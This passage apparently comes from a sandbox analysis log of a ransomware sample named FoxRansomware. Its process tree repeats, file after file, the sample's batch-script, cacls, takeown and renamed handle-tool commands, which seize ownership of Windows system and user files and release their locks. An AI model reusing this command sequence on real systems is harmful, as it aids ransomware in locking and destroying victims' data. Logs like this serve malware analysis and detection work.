takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml"
3⤵
PID:7068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "ThemeSettings2013.xml" -nobanner
3⤵
PID:452

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "ThemeSettings2013.xml" -nobanner
4⤵
PID:6432

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:3436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""
2⤵
PID:6272

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:7352

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C
3⤵
PID:4016

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"
3⤵
- Modifies file permissions
PID:7524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner
3⤵
PID:8148

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner
4⤵
PID:5752

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""
2⤵
PID:8016

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:8152

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C
3⤵
PID:6216

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"
3⤵
- Modifies file permissions
PID:5108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner
3⤵
PID:8096

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner
4⤵
PID:1484

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""
2⤵
PID:6256

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C
3⤵
PID:7572

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"
3⤵
- Modifies file permissions
PID:6888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner
3⤵
PID:1112

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner
4⤵
PID:4544

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
2⤵
PID:6208

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
3⤵
PID:6956

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
3⤵
- Modifies file permissions
PID:7576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resource.xml" -nobanner
3⤵
PID:7464

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resource.xml" -nobanner
4⤵
PID:7296

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
2⤵
PID:5748

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
3⤵
PID:7620

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
3⤵
PID:6448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resource.xml" -nobanner
3⤵
PID:7800

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resource.xml" -nobanner
4⤵
PID:5912

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.4fcbe6d5-99ae-485d-8d28-d113e46acd9e.1.etl""
2⤵
PID:7376

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.4fcbe6d5-99ae-485d-8d28-d113e46acd9e.1.etl" /E /G Admin:F /C
3⤵
PID:7164

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.4fcbe6d5-99ae-485d-8d28-d113e46acd9e.1.etl"
3⤵
- Modifies file permissions
PID:3428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MoUsoCoreWorker.4fcbe6d5-99ae-485d-8d28-d113e46acd9e.1.etl" -nobanner
3⤵
PID:1668

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MoUsoCoreWorker.4fcbe6d5-99ae-485d-8d28-d113e46acd9e.1.etl" -nobanner
4⤵
PID:4656

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.b196995e-0878-4d09-a482-644237a8be8e.1.etl""
2⤵
PID:7776

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.b196995e-0878-4d09-a482-644237a8be8e.1.etl" /E /G Admin:F /C
3⤵
PID:5900

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.b196995e-0878-4d09-a482-644237a8be8e.1.etl"
3⤵
PID:5436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "WuProvider.b196995e-0878-4d09-a482-644237a8be8e.1.etl" -nobanner
3⤵
PID:7652

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "WuProvider.b196995e-0878-4d09-a482-644237a8be8e.1.etl" -nobanner
4⤵
PID:6844

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""
2⤵
PID:5168

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C
3⤵
PID:7896

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"
3⤵
- Modifies file permissions
PID:7740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "DesktopSettings2013.xml" -nobanner
3⤵
PID:5492

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "DesktopSettings2013.xml" -nobanner
4⤵
PID:8056

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:2256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""
2⤵
PID:8048

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C
3⤵
PID:7148

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"
3⤵
PID:3092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
3⤵
PID:3876

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
4⤵
PID:7032

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""
2⤵
PID:7088

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C
3⤵
PID:6348

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"
3⤵
PID:4196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
3⤵
PID:7592

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
4⤵
PID:5300

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6928

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml""
2⤵
PID:7672

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C
3⤵
PID:4320

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml"
3⤵
PID:6356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "VdiState.xml" -nobanner
3⤵
PID:8024

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "VdiState.xml" -nobanner
4⤵
PID:3196

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm""
2⤵
PID:5636

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm" /E /G Admin:F /C
3⤵
PID:4140

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm"
3⤵
- Modifies file permissions
PID:2472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "ActivitiesCache.db-shm" -nobanner
3⤵
PID:6264

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "ActivitiesCache.db-shm" -nobanner
4⤵
PID:3900

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""
2⤵
PID:7664

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C
3⤵
PID:6560

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"
3⤵
PID:5412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftLync2010.xml" -nobanner
3⤵
PID:5696

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftLync2010.xml" -nobanner
4⤵
PID:6156

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""
2⤵
PID:6604

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C
3⤵
PID:7600

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"
3⤵
PID:7968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
3⤵
PID:5992

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
4⤵
PID:444

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""
2⤵
PID:6412

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C
3⤵
PID:6780

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"
3⤵
PID:5892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
3⤵
PID:5868

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
4⤵
PID:6612

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
2⤵
PID:6408

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C
3⤵
PID:8084

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"
3⤵
PID:6300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
3⤵
PID:7208

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
4⤵
PID:272

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
2⤵
PID:6488

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
3⤵
PID:6968

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
3⤵
- Modifies file permissions
PID:7568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "overlay.png" -nobanner
3⤵
PID:6688

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "overlay.png" -nobanner
4⤵
PID:6512

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:3852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml""
2⤵
PID:1008

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml" /E /G Admin:F /C
3⤵
PID:528

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml"
3⤵
PID:6344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftNotepad.xml" -nobanner
3⤵
PID:3416

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftNotepad.xml" -nobanner
4⤵
PID:2444

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml""
2⤵
PID:5480

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" /E /G Admin:F /C
3⤵
PID:4672

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml"
3⤵
- Modifies file permissions
PID:7340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
3⤵
PID:652

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
4⤵
PID:3612

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml""
2⤵
PID:3948

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" /E /G Admin:F /C
3⤵
PID:7532

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml"
3⤵
PID:2028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "NetworkPrinters.xml" -nobanner
3⤵
PID:4080

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "NetworkPrinters.xml" -nobanner
4⤵
PID:5024

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.4f65b9a7-2be2-4020-8fb6-1e9d0028b5de.1.etl""
2⤵
PID:4888

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.4f65b9a7-2be2-4020-8fb6-1e9d0028b5de.1.etl" /E /G Admin:F /C
3⤵
PID:2380

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.4f65b9a7-2be2-4020-8fb6-1e9d0028b5de.1.etl"
3⤵
PID:6664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "NotificationUxBroker.4f65b9a7-2be2-4020-8fb6-1e9d0028b5de.1.etl" -nobanner
3⤵
PID:6708

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "NotificationUxBroker.4f65b9a7-2be2-4020-8fb6-1e9d0028b5de.1.etl" -nobanner
4⤵
PID:5784

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""
2⤵
PID:6568

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C
3⤵
PID:5828

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"
3⤵
- Modifies file permissions
PID:5096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resource.xml" -nobanner
3⤵
PID:8016

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resource.xml" -nobanner
4⤵
PID:8152

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
2⤵
PID:2900

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
3⤵
PID:1112

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
3⤵
- Modifies file permissions
PID:7192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "tasks.xml" -nobanner
3⤵
PID:940

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "tasks.xml" -nobanner
4⤵
PID:6256

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""
2⤵
PID:5520

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C
3⤵
PID:3128

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"
3⤵
PID:3420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
3⤵
PID:5964

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
4⤵
PID:5656

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""
2⤵
